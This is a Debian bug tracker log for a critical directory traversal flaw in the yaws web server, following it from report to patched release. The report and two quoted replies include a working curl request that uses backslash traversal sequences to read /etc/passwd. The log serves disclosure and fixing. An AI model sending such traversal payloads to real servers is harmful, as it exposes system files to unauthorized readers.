Debian Bug report logs - #650009
yaws vulnerable to directory traversal using ..\\

version graph

Package: yaws; Maintainer for yaws is Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>; Source for yaws is src:yaws (PTS, buildd, popcon).

Reported by: Fabian Linzberger <e@lefant.net>

Date: Fri, 25 Nov 2011 15:09:05 UTC

Severity: critical

Tags: security, sid, upstream

Found in version yaws/1.91-1

Fixed in version yaws/1.91-2

Done: Sergei Golovan <sgolovan@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Fri, 25 Nov 2011 15:09:08 GMT) (full text, mbox, link).


Acknowledgement sent to Fabian Linzberger <e@lefant.net>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Fri, 25 Nov 2011 15:09:08 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Fabian Linzberger <e@lefant.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: yaws vulnerable to directory traversal using ..\\
Date: Fri, 25 Nov 2011 16:04:43 +0100
Package: yaws
Version: 1.91-1
Severity: critical
Tags: security upstream sid

Hi,

A directory traversal vulnerability in yaws has been discovered and
disclosed at [1].

At least the version of yaws currently in sid (1.91) is affected. One
can reproduce the issue by running:

curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'

against a fresh install of the yaws package with default config.

This will return a copy of the /etc/passwd file. The default config
only binds yaws to the localhost ip, but the vulnerability is the same
if you run it on public addresses (as one would in many typical
installations, it is a webserver). 


I was not able to reproduce the issue in the version of the package in
squeeze, with the above GET request, but I have not done a thorough
investigation.


Upstream has promised a fix in the linked bug report, but there is no
official patch yet.



  Fabian


[1]: https://github.com/klacke/yaws/issues/69




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Fri, 25 Nov 2011 20:39:03 GMT) (full text, mbox, link).


Acknowledgement sent to Sergei Golovan <sgolovan@nes.ru>:
Extra info received and forwarded to list. Copy sent to Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Fri, 25 Nov 2011 20:39:03 GMT) (full text, mbox, link).


Message #10 received at 650009@bugs.debian.org (full text, mbox, reply):

From: Sergei Golovan <sgolovan@nes.ru>
To: Fabian Linzberger <e@lefant.net>, 650009@bugs.debian.org
Subject: Re: [Pkg-erlang-devel] Bug#650009: yaws vulnerable to directory traversal using ..\\
Date: Sat, 26 Nov 2011 00:36:41 +0400
On Fri, Nov 25, 2011 at 7:04 PM, Fabian Linzberger <e@lefant.net> wrote:
>
> A directory traversal vulnerability in yaws has been discovered and
> disclosed at [1].
>
> At least the version of yaws currently in sid (1.91) is affected. One
> can reproduce the issue by running:
>
> curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'

The bug is reproducible... So, I'll try to look into it also.

Cheers!
-- 
Sergei Golovan




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Sat, 26 Nov 2011 10:09:03 GMT) (full text, mbox, link).


Acknowledgement sent to Sergei Golovan <sgolovan@nes.ru>:
Extra info received and forwarded to list. Copy sent to Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Sat, 26 Nov 2011 10:09:06 GMT) (full text, mbox, link).


Message #15 received at 650009@bugs.debian.org (full text, mbox, reply):

From: Sergei Golovan <sgolovan@nes.ru>
To: Fabian Linzberger <e@lefant.net>, 650009@bugs.debian.org
Subject: Re: [Pkg-erlang-devel] Bug#650009: yaws vulnerable to directory traversal using ..\\
Date: Sat, 26 Nov 2011 14:05:41 +0400
On Sat, Nov 26, 2011 at 12:36 AM, Sergei Golovan <sgolovan@nes.ru> wrote:
> On Fri, Nov 25, 2011 at 7:04 PM, Fabian Linzberger <e@lefant.net> wrote:
>>
>> A directory traversal vulnerability in yaws has been discovered and
>> disclosed at [1].
>>
>> At least the version of yaws currently in sid (1.91) is affected. One
>> can reproduce the issue by running:
>>
>> curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'
>
> The bug is reproducible... So, I'll try to look into it also.

Both 1.77 (in oldstable) and 1.88 (in stable) do not recognize \\ as a
path separator, so they aren't vulnerable.

Cheers!
-- 
Sergei Golovan




Reply sent to Sergei Golovan <sgolovan@debian.org>:
You have taken responsibility. (Sat, 26 Nov 2011 16:06:03 GMT) (full text, mbox, link).


Notification sent to Fabian Linzberger <e@lefant.net>:
Bug acknowledged by developer. (Sat, 26 Nov 2011 16:06:03 GMT) (full text, mbox, link).


Message #20 received at 650009-close@bugs.debian.org (full text, mbox, reply):

From: Sergei Golovan <sgolovan@debian.org>
To: 650009-close@bugs.debian.org
Subject: Bug#650009: fixed in yaws 1.91-2
Date: Sat, 26 Nov 2011 16:04:26 +0000
Source: yaws
Source-Version: 1.91-2

We believe that the bug you reported is fixed in the latest version of
yaws, which is due to be installed in the Debian FTP archive:

erlang-yaws_1.91-2_i386.deb
  to main/y/yaws/erlang-yaws_1.91-2_i386.deb
yaws-chat_1.91-2_all.deb
  to main/y/yaws/yaws-chat_1.91-2_all.deb
yaws-doc_1.91-2_all.deb
  to main/y/yaws/yaws-doc_1.91-2_all.deb
yaws-mail_1.91-2_all.deb
  to main/y/yaws/yaws-mail_1.91-2_all.deb
yaws-wiki_1.91-2_all.deb
  to main/y/yaws/yaws-wiki_1.91-2_all.deb
yaws-yapp_1.91-2_all.deb
  to main/y/yaws/yaws-yapp_1.91-2_all.deb
yaws_1.91-2.diff.gz
  to main/y/yaws/yaws_1.91-2.diff.gz
yaws_1.91-2.dsc
  to main/y/yaws/yaws_1.91-2.dsc
yaws_1.91-2_all.deb
  to main/y/yaws/yaws_1.91-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 650009@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sergei Golovan <sgolovan@debian.org> (supplier of updated yaws package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 26 Nov 2011 19:34:12 +0400
Source: yaws
Binary: yaws erlang-yaws yaws-doc yaws-chat yaws-mail yaws-wiki yaws-yapp
Architecture: source i386 all
Version: 1.91-2
Distribution: unstable
Urgency: high
Maintainer: Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>
Changed-By: Sergei Golovan <sgolovan@debian.org>
Description: 
 erlang-yaws - Erlang application which implements HTTP webserver
 yaws       - High performance HTTP 1.1 webserver written in Erlang
 yaws-chat  - Chat application for Yaws web server
 yaws-doc   - Documentation and examples for Yaws web server
 yaws-mail  - Webmail application for Yaws web server
 yaws-wiki  - Wiki application for Yaws web server
 yaws-yapp  - Provides an easy way to deploy applications for Yaws web server
Closes: 650009
Changes: 
 yaws (1.91-2) unstable; urgency=high
 .
   * Added patch by Uwe Dauernheim which fixes directory traversal bug
     (closes: #650009).
Checksums-Sha1: 
 1959a626d484ef0c8072fa00d761967da618d773 1661 yaws_1.91-2.dsc
 cd753f0e489e520097031dd3e47e060c278795a6 22269 yaws_1.91-2.diff.gz
 f6f7a24a69f880166c4689ab31aed8b5de675313 336938 erlang-yaws_1.91-2_i386.deb
 c476227621123dfac118b9c83068302545475ced 73728 yaws_1.91-2_all.deb
 3e6d308d1a05b0a686f26cf4eb8a7f06a5db6d5e 614944 yaws-doc_1.91-2_all.deb
 a3e1197bd5dac15ad887fd526a4eecc242d3e9e9 66304 yaws-chat_1.91-2_all.deb
 04f9b22925a3a4f7faf42af82177051f8c10d618 160256 yaws-mail_1.91-2_all.deb
 6823001b2d08b7ec5a81a1c6979d91a2736128fa 201894 yaws-wiki_1.91-2_all.deb
 ca1d0d1c5ef0d587c19fa46e235b9c0bf2f0265f 68846 yaws-yapp_1.91-2_all.deb
Checksums-Sha256: 
 8c2d27f6542415c71009f78cb5fc0058960a3dd2f6f6dfb848b99bf692c679f9 1661 yaws_1.91-2.dsc
 29ba8d2414b646c4712b2234a11eacb858378dcf328d7f72ceb8764e4c46f74d 22269 yaws_1.91-2.diff.gz
 9729a8ab891bf0e4ad19ba9e237033a9cf76412ce6545fdc27edfda73d7d8ff5 336938 erlang-yaws_1.91-2_i386.deb
 67f229d001cbec0c07b67767b00f50f3805b2b2207dfb04d49807d283ceaa275 73728 yaws_1.91-2_all.deb
 683bc64ec3a05ff358454b074ec6dd290ac49a372b57331ee4fb8bd70837bb5c 614944 yaws-doc_1.91-2_all.deb
 b46b1b24c162e1b859ed8c0fb1995f8fcec9aa11064e06d83b9babe9c7824ef0 66304 yaws-chat_1.91-2_all.deb
 8ff1832d3fa82cdec4aa477c0d1f51a06254257cc281e6b9798d7eb12dcce671 160256 yaws-mail_1.91-2_all.deb
 96c162bd5edd9218d411fff9a9022a1b0fffc5d861c61bb4747e1251be989293 201894 yaws-wiki_1.91-2_all.deb
 02741c2f692d90e062851e0be8cac2088aeb8dfcaa5c822c4b154cf9e2e6ca64 68846 yaws-yapp_1.91-2_all.deb
Files: 
 11822fba157c3ad5134fc7c70da3933e 1661 httpd optional yaws_1.91-2.dsc
 42b3a182fa4b25e93a88c444882af741 22269 httpd optional yaws_1.91-2.diff.gz
 198693b6455f6837cdad8b10d3561d93 336938 httpd optional erlang-yaws_1.91-2_i386.deb
 27970515d4fbae9a610b946c85f36d55 73728 httpd optional yaws_1.91-2_all.deb
 62366b228608b717c180d50d41294134 614944 doc optional yaws-doc_1.91-2_all.deb
 cad1430673d85b880d5ec7e1fb5f9c11 66304 web optional yaws-chat_1.91-2_all.deb
 c3e20e5f591c5e1871e961fac8f9f18f 160256 web optional yaws-mail_1.91-2_all.deb
 b08adc2dc9581fc66efbe1ee5d57ca9f 201894 web optional yaws-wiki_1.91-2_all.deb
 d6fdc4139460d680187de42f44b50bcd 68846 web optional yaws-yapp_1.91-2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFO0QuvIcdH02pGEFIRAmyRAKCPEjsBC2d7LPqnKC3j01QMrbdT4QCaAk6E
9N0+BZHTJe6wBGVxnWC80bU=
=a7/W
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 27 Dec 2011 07:33:02 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Aug 2 03:29:43 2024; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.